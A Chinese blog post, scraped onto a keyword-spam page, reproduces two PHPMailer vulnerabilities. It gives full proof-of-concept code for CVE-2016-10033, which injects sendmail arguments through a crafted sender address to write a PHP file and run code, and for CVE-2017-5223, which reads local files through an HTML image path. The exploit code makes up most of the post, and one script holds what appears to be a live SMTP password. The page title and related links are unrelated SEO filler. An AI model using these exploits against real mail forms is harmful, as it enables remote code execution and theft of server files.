当前位置: 首页 > news >正文

老年人做网站自媒体人专用网站

老年人做网站,自媒体人专用网站,网站后台漏洞,东营做网站seo今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套…

  今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套CMS进行复现,这边也顺便利用这个PHPMailer-5.2.13对CVE-2016-10033和CVE-2017-5223进行本地复现,记录一下。

 

PHPMailer 命令执行漏洞(CVE-2016-10033)

漏洞编号:CVE-2016-10033

影响版本:PHPMailer< 5.2.18

漏洞级别: 高危

漏洞POC:

<?php /* 
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) 
A simple PoC (working on Sendmail MTA) 
It will inject the following parameters to sendmail command: 
Arg no. 0 == [/usr/sbin/sendmail] 
Arg no. 1 == [-t] 
Arg no. 2 == [-i] 
Arg no. 3 == [-fattacker\] 
Arg no. 4 == [-oQ/tmp/] 
Arg no. 5 == [-X/var/www/cache/phpcode.php] 
Arg no. 6 == [some"@email.com] 
which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
The resulting file will contain the payload passed in the body of the msg: 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306 
09607 <<< Content-Type: text/html; charset=us-ascii 
09607 <<< 
09607 <<< <?php phpinfo(); ?> 09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- 
See the full advisory URL for details. 
*/ // Attacker's input coming from untrusted source such as $_GET , $_POST etc.  // For example from a Contact form  $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
$msg_body  = "<?php phpinfo(); ?>"; // ------------------  // mail() param injection via the vulnerability in PHPMailer  require_once('class.phpmailer.php'); 
$mail = new PHPMailer(); // defaults to using php "mail()"  $mail->SetFrom($email_from, 'Client Name'); 
$address = "customer_feedback@company-X.com"; 
$mail->AddAddress($address, "Some User"); 
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
$mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; 
} else { echo "Message sent!\n"; 
}

 

PHPMailer任意文件读取漏洞分析(CVE-2017-5223)

漏洞编号: CVE-2017-5223

影响版本: PHPMailer <= 5.2.21

漏洞级别: 高危

漏洞POC:根据作者的POC改了几行,使其适用于qq邮箱

<?php  
#Author:Yxlinkrequire_once('PHPMailerAutoload.php');
$mail = new PHPMailer();
$mail->isSMTP();
$mail->Host = 'smtp.qq.com'; 
$mail->Port = 465; 
$mail->SMTPAuth = true; 
$mail->Username = xxxx@qq.com';  //qq邮箱
$mail->Password = 'zsuhxbmsaioxbcgb';//申请配置邮件客户端获取到的16位密码和qq密码不一样
$mail->SMTPSecure = 'ssl';$mail->CharSet  = "UTF-8";
$mail->Encoding = "base64";$mail->Subject = "hello";
$mail->From = "xxxx@qq.com";  
$mail->FromName = "test";  $address = "xxxx@qq.com";
$mail->AddAddress($address, "test");$mail->AddAttachment('test.txt','test.txt'); 
$mail->IsHTML(true);  
$msg="<img src='D:\\1.txt'>test";
$mail->msgHTML($msg);if(!$mail->Send()) {echo "Mailer Error: " . $mail->ErrorInfo;
} else {echo "Message sent!";
}
?>

 

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

 

参考文章:

PHPMailer任意文件读取漏洞分析(CVE-2017-5223)http://www.freebuf.com/vuls/124820.html

PHPMailer 命令执行漏洞(CVE-2016-10033)分析 http://blog.csdn.net/wyvbboy/article/details/53969278

http://www.lbrq.cn/news/2698975.html

相关文章:

  • 网站开发实战 课程线上营销推广方式
  • 怎样做 网站的快捷链接seodao cn
  • 西安网站建设交易指数基金排名前十名
  • 做调查网站怎样换IP网站链接分析工具
  • 企业网站制作优化百度搜索
  • 江门seo网站排名短视频营销
  • 做网站 用什么语言百度收录情况查询
  • 建企业网站东莞百度快速优化排名
  • 石狮网站建设价格全网营销推广怎么做
  • 公司内部网站维护微信广告推广价格表
  • 如何自主建设企业网站网络营销怎么做
  • 四川建设网官方网站网站建设流程
  • 企业网站建设原则百度商家入驻
  • 实体行业做分销网站有什么好处知乎推广合作
  • 做详情页的网站专业网站推广引流
  • 前端设计除了做网站还能做什么郑州关键词优化费用
  • 洪梅镇仿做网站网络营销是做什么
  • 东阳网站建设方案做网站用什么软件
  • 网站模板源代码手游cpa推广平台
  • 贵阳网站开发最新搜索引擎排名
  • 瓯北网站制作系统百度搜图
  • 做宣传册参考网站郑州整站关键词搜索排名技术
  • 建设商务网站需要哪些步骤seo服务价格表
  • wordpress开启伪静态找不到页面烟台seo
  • 海南的网站建设公司搜索引擎优化策略不包括
  • 微信公众号做电影网站长春网站建设推广
  • 苏州安岭网站建设公司电商网站seo优化
  • 怀化平台免费网站建设seo
  • 电子商务网站建设规划范文google登录入口
  • 电脑做ppt一般下载哪个网站好少儿编程
  • Python3解释器深度解析与实战教程:从源码到性能优化的全路径探索
  • 【DL】深层神经网络
  • 【测试】Bug+设计测试用例
  • 电子电气架构 --- 软件定义汽车的驱动和挑战
  • buildroot编译qt 5.9.8 arm64版本踩坑
  • 深入浅出设计模式——行为型模式之观察者模式 Observer